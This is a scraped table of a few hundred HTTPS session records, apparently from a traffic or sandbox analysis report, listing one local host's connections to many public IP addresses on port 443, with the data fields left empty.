                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12169192.168.2.1334728179.68.71.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12170192.168.2.1339686210.177.210.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12171192.168.2.1350380106.127.0.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12172192.168.2.1349584210.7.168.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12173192.168.2.1337146169.225.19.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12174192.168.2.1348898161.96.227.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12175192.168.2.1360684188.184.0.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12176192.168.2.1334462213.66.138.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12177192.168.2.1351564209.8.41.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12178192.168.2.134277820.190.27.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12179192.168.2.1334410203.152.161.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12180192.168.2.1344782221.248.36.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12181192.168.2.1339678190.151.146.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12182192.168.2.1349658159.122.46.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12183192.168.2.1347046169.116.217.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12184192.168.2.134106041.252.186.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12185192.168.2.1356672222.5.245.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12186192.168.2.1333730126.143.148.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12187192.168.2.135120045.240.152.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12188192.168.2.134658281.1.238.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12189192.168.2.133350867.175.209.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12190192.168.2.1360512162.21.6.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12191192.168.2.1348078107.33.142.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12192192.168.2.134627047.183.83.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12193192.168.2.134109068.250.231.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12194192.168.2.1340968199.111.158.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12195192.168.2.1345918217.108.88.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12196192.168.2.1333162131.69.231.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12197192.168.2.1348310108.176.131.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12198192.168.2.1351350202.222.101.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12199192.168.2.1344788118.18.185.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12200192.168.2.133396296.167.113.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12201192.168.2.13576245.12.79.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12202192.168.2.1352318109.138.79.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12203192.168.2.1341542189.132.117.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12204192.168.2.134621818.32.19.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12205192.168.2.1352922221.239.116.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12206192.168.2.135933436.223.148.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12207192.168.2.1351012123.74.242.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12208192.168.2.134813819.197.207.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12209192.168.2.135198877.87.28.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12210192.168.2.1340588149.225.122.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12211192.168.2.1343942100.47.244.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12212192.168.2.135401684.119.152.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12213192.168.2.1336764101.142.233.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12214192.168.2.1352754206.188.6.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12215192.168.2.13567664.81.124.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12216192.168.2.133569013.10.124.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12217192.168.2.135772032.238.183.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12218192.168.2.1334882170.26.246.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12219192.168.2.135441496.171.27.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12220192.168.2.133942012.55.179.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12221192.168.2.1344396103.78.244.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12222192.168.2.1350836188.46.65.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12223192.168.2.1333990168.119.100.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12224192.168.2.1348352171.96.62.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12225192.168.2.1350496218.183.246.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12226192.168.2.1360456184.249.139.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12227192.168.2.133402854.158.161.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12228192.168.2.134562082.98.102.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12229192.168.2.135922417.57.194.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12230192.168.2.1343186211.222.125.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12231192.168.2.136096699.239.38.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12232192.168.2.134366057.34.38.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12233192.168.2.1344628107.220.229.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12234192.168.2.135051846.197.27.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12235192.168.2.1350590222.106.73.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12236192.168.2.135567244.110.2.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12237192.168.2.135106477.71.191.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12238192.168.2.134304025.188.201.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12239192.168.2.134932234.177.255.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12240192.168.2.1347846116.130.206.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12241192.168.2.133572062.171.244.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12242192.168.2.134386437.129.77.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12243192.168.2.1358208219.209.70.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12244192.168.2.1357444203.83.78.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12245192.168.2.1344396189.172.83.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12246192.168.2.1356210194.220.194.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12247192.168.2.135430839.172.136.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12248192.168.2.135967899.93.217.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12249192.168.2.1340162223.11.13.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12250192.168.2.1352676168.11.51.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12251192.168.2.1360610111.197.150.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12252192.168.2.135689663.42.54.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12253192.168.2.1338976206.105.228.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12254192.168.2.135369688.202.3.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12255192.168.2.134380868.21.110.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12256192.168.2.1344294178.179.8.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12257192.168.2.1337094165.142.255.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12258192.168.2.135060085.33.201.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12259192.168.2.1334282191.67.31.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12260192.168.2.1334780221.39.198.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12261192.168.2.1340046196.173.186.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12262192.168.2.135015461.154.173.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12263192.168.2.134855483.146.237.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12264192.168.2.133561853.152.215.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12265192.168.2.1339226166.28.70.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12266192.168.2.1354884150.218.177.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12267192.168.2.134336018.122.4.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12268192.168.2.1346130213.127.29.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12269192.168.2.1348732164.119.158.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12270192.168.2.134045683.113.243.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12271192.168.2.134346688.250.214.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12272192.168.2.1354022153.188.134.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12273192.168.2.135269297.104.253.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12274192.168.2.1343912145.161.98.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12275192.168.2.1353452177.87.49.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12276192.168.2.1339302105.244.124.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12277192.168.2.133592024.80.111.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12278192.168.2.1339922118.212.73.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12279192.168.2.1358214210.194.160.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12280192.168.2.1335436118.121.148.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12281192.168.2.134192098.243.176.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12282192.168.2.1357206182.144.4.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12283192.168.2.133714871.48.3.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12284192.168.2.1347030218.170.101.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12285192.168.2.1334508175.212.33.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12286192.168.2.1350538177.15.148.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12287192.168.2.1343348205.140.152.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12288192.168.2.1357576154.148.247.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12289192.168.2.134977246.5.69.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12290192.168.2.1350402197.76.131.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12291192.168.2.135742414.166.63.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12292192.168.2.1339068143.118.16.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12293192.168.2.1343130218.119.34.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12294192.168.2.13430922.213.122.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12295192.168.2.13429108.244.131.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12296192.168.2.135190651.236.67.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12297192.168.2.133891634.207.142.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12298192.168.2.1346106138.24.170.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12299192.168.2.1354828143.209.58.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12300192.168.2.134019249.112.76.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12301192.168.2.1357420185.4.228.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12302192.168.2.133656853.74.177.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12303192.168.2.135736413.203.97.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12304192.168.2.1345690213.141.174.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12305192.168.2.134104664.245.77.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12306192.168.2.133946064.87.134.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12307192.168.2.1342136155.216.249.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12308192.168.2.1355354125.35.239.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12309192.168.2.1351224180.71.162.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12310192.168.2.1355702141.166.137.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12311192.168.2.1344864179.166.13.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12312192.168.2.1342434177.157.137.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12313192.168.2.13408201.59.61.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12314192.168.2.1334440181.244.174.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12315192.168.2.134861452.73.169.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12316192.168.2.1346988106.203.249.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12317192.168.2.1340102110.70.218.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12318192.168.2.1358476151.49.65.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12319192.168.2.1350790142.138.58.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12320192.168.2.134047299.212.54.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12321192.168.2.135932094.186.54.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12322192.168.2.134934041.119.132.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12323192.168.2.1354042206.97.84.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12324192.168.2.134422854.96.251.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12325192.168.2.1357316134.75.233.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12326192.168.2.1351266193.97.40.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12327192.168.2.134351414.243.249.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12328192.168.2.1349406200.3.159.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12329192.168.2.134323879.217.222.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12330192.168.2.133322099.180.124.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12331192.168.2.134813852.53.221.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12332192.168.2.1360084172.112.194.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12333192.168.2.1358528189.120.220.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12334192.168.2.1357270207.233.106.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12335192.168.2.133921019.169.161.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12336192.168.2.133770013.78.39.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12337192.168.2.1346432151.165.230.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12338192.168.2.134321690.218.14.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12339192.168.2.135927835.183.103.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12340192.168.2.1348600114.253.163.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12341192.168.2.134966062.10.147.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12342192.168.2.1360338130.56.82.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12343192.168.2.134356092.252.4.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12344192.168.2.1332790113.93.80.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12345192.168.2.1337952204.52.103.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12346192.168.2.134332060.159.68.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12347192.168.2.135289077.61.89.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12348192.168.2.1340194103.175.18.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12349192.168.2.1345458122.162.143.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12350192.168.2.1357094120.166.185.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12351192.168.2.1351438169.243.26.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12352192.168.2.134843417.166.40.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12353192.168.2.1343448104.218.18.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12354192.168.2.135549658.149.3.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12355192.168.2.134841272.81.45.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12356192.168.2.1335732208.172.160.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12357192.168.2.13334882.74.211.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12358192.168.2.133699041.138.119.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12359192.168.2.13514428.129.156.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12360192.168.2.1358132206.252.150.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12361192.168.2.1344316170.5.202.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12362192.168.2.1338424202.252.145.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12363192.168.2.13527969.253.53.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12364192.168.2.1350778118.154.120.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12365192.168.2.134080253.219.199.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12366192.168.2.133945659.109.229.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12367192.168.2.1349560221.88.68.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12368192.168.2.1358728158.175.47.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12369192.168.2.1356912122.146.7.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12370192.168.2.133730035.78.178.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12371192.168.2.1343238160.50.184.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12372192.168.2.1342368182.240.80.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12373192.168.2.1342288143.47.242.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12374192.168.2.1357072191.39.216.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12375192.168.2.1344056148.178.11.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12376192.168.2.1342898146.180.25.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12377192.168.2.134661680.216.78.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12378192.168.2.135231266.187.128.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12379192.168.2.1338498111.205.192.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12380192.168.2.13384182.223.28.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12381192.168.2.1343326187.192.108.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12382192.168.2.1345692115.74.74.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12383192.168.2.1335180209.132.63.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12384192.168.2.1358512211.8.76.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12385192.168.2.1358540129.16.104.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12386192.168.2.1340836199.56.137.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12387192.168.2.135910417.157.144.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12388192.168.2.1358652220.207.177.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12389192.168.2.133844242.195.23.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12390192.168.2.134249485.61.101.213443
